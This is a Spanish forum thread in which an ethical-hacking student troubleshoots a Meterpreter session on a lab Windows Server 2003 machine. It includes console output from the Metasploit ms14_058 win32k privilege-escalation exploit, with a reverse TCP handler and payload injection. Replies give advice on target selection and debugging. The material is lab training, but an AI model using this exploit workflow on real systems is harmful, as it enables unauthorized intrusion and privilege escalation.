Error cmd.exe meterpreter y WS2003

Iniciado por maziuone, 27 Abril 2020, 16:13 PM

0 Miembros y 1 Visitante están viendo este tema.

maziuone

Buenas, a ver si me podéis echar una mano por que me estoy volviendo loco ya jeje.

Estoy haciendo un curso de hacking ético, y estoy atacando desde kali a una maquina de windows server 2003 que facilitan los del curso.

Y el caso es que consigo una sesión con meterpreter hacia esa maquina y cuando escribo shell para que me abra la linea de comandos se queda ahí atascado. Si voy a la mv ws2003 veo que sale en el escritorio un error de cmd.exe.

El usuario con el que lo intento abrir es NT AUTHORITY\SYSTEM por lo que debería poder abrir cmd.

En cambio si escribo shell con usuario NT AUTHORITY servicio de red abre cmd sin problemas.
Adjunto comandos.

Active sessions
===============

  Id  Name  Type                     Information                                     Connection
  --  ----  ----                     -----------                                     ----------
  9         meterpreter x86/windows  NT AUTHORITY\Servicio de red @ MEGATRON-IN9JJC  192.168.174.128:4444 -> 192.168.174.137:1198 (192.168.174.137)
  10        meterpreter x86/windows  NT AUTHORITY\Servicio de red @ MEGATRON-IN9JJC  192.168.174.128:4444 -> 192.168.174.137:1201 (192.168.174.137)

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set session 10
session => 10
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

  • Started reverse TCP handler on 192.168.174.128:4444
  • Launching notepad to host the exploit...
  • Process 6096 launched.
  • Reflectively injecting the exploit DLL into 6096...
  • Injecting exploit into 6096...
  • Exploit injected. Injecting payload into 6096...
  • Payload injected. Executing exploit...
  • Sending stage (180291 bytes) to 192.168.174.137
  • Exploit finished, wait for (hopefully privileged) payload execution to complete.
  • Meterpreter session 11 opened (192.168.174.128:4444 -> 192.168.174.137:1206) at 2020-04-27 15:33:41 +0200

    meterpreter > shell
    Process 3348 created.
    Channel 1 created.
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > shell
    Process 3404 created.
    Channel 2 created.
    meterpreter >


    He buscado por internet y no veo nada relacionado. He cargado de nuevo la mv ws2003 por si era algo de sistema aunque no tiene sentido por que con el user nt auhority servicios de red si lo abre, pero nada.

    Alguna idea? Hago algo mal?

EdePC

Que dice el error de cmd.exe?, has revisado el visor de eventos del w2003?, quizá no puede cargar o no tiene permiso de cargar alguna dependencia de cmd.exe como System, esto debería de reflejarse en el Visor de Eventos o podrías utilizar Process Monitor para ver que sucede.

maziuone

Cita de: EdePC en 27 Abril 2020, 16:24 PM
Que dice el error de cmd.exe?, has revisado el visor de eventos del w2003?, quizá no puede cargar o no tiene permiso de cargar alguna dependencia de cmd.exe como System, esto debería de reflejarse en el Visor de Eventos o podrías utilizar Process Monitor para ver que sucede.

El error que da es cmd.exe (0xc0000142)

En el visor de eventos el error que da es este: (error id 1030)

Windows no puede hacer una consulta de la lista de objetos directiva de grupo. Compruebe el registro de eventos ante la posible existencia de mensajes previamente registrados por el motor de directiva que describe el motivo del suceso.

Para obtener más información, vea el Centro de ayuda y soporte técnico en http://go.microsoft.com/fwlink/events.asp.

maziuone


EdePC

El error que te da es bastante genérico y tiene pocos detalles, tengo entendido de que es un problema de acceso a dependencias, puede ser por permisos de archivo o políticas de restricción.

Lo que se me ocurre es que utilices ProcMon (Process Monitor) y te ponga a monitorizar el Registro y los Archivos, luego llames a ejecutar cmd.exe cuando funciona, despues cuando no funciona y comparar Logs.

maziuone

#5
Cita de: EdePC en 28 Abril 2020, 17:38 PM
El error que te da es bastante genérico y tiene pocos detalles, tengo entendido de que es un problema de acceso a dependencias, puede ser por permisos de archivo o políticas de restricción.

Lo que se me ocurre es que utilices ProcMon (Process Monitor) y te ponga a monitorizar el Registro y los Archivos, luego llames a ejecutar cmd.exe cuando funciona, despues cuando no funciona y comparar Logs.

Pues he monitorizado con procmon y al ejecutar cmd desde meterpreter me dice success en procmon. La verdad es que ya no sé que hacer.

Arcano.

Buenas,

En la descripción de ese exploit te indica:

"Description:
  This module exploits a NULL Pointer Dereference in win32k.sys, the
  vulnerability can be triggered through the use of TrackPopupMenu.
  Under special conditions, the NULL pointer dereference can be abused
  on xxxSendMessageTimeout to achieve arbitrary code execution. This
  module has been tested successfully on Windows XP SP3, Windows 2003
  SP2
, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1
  and Windows 2008 R2 SP1 64 bits."


El server que estás utilizando, creo, tiene SP1. Por otro lado, en ocasiones la descripción es orientativa, tu exploit es de método post-explotación; cuando ya has conseguido el acceso. ¿Con qué exploit/payload previo has conseguido la sesión? Revisa el target. Si no lo has cambiado, te lo lanza como auto (inglés). Y el server es spanish -59  Windows 2003 SP1 Spanish (NO NX)-

Y, por último, si con el exploit/payload previo ya eres SYSTEM, ¿para qué vuelves a lanzar el segundo exploit?. Sólo te serviría para elevar privilegios, pero... Ya eres SYSTEM =)

Saludos!
La curiosidad es la antesala al conocimiento...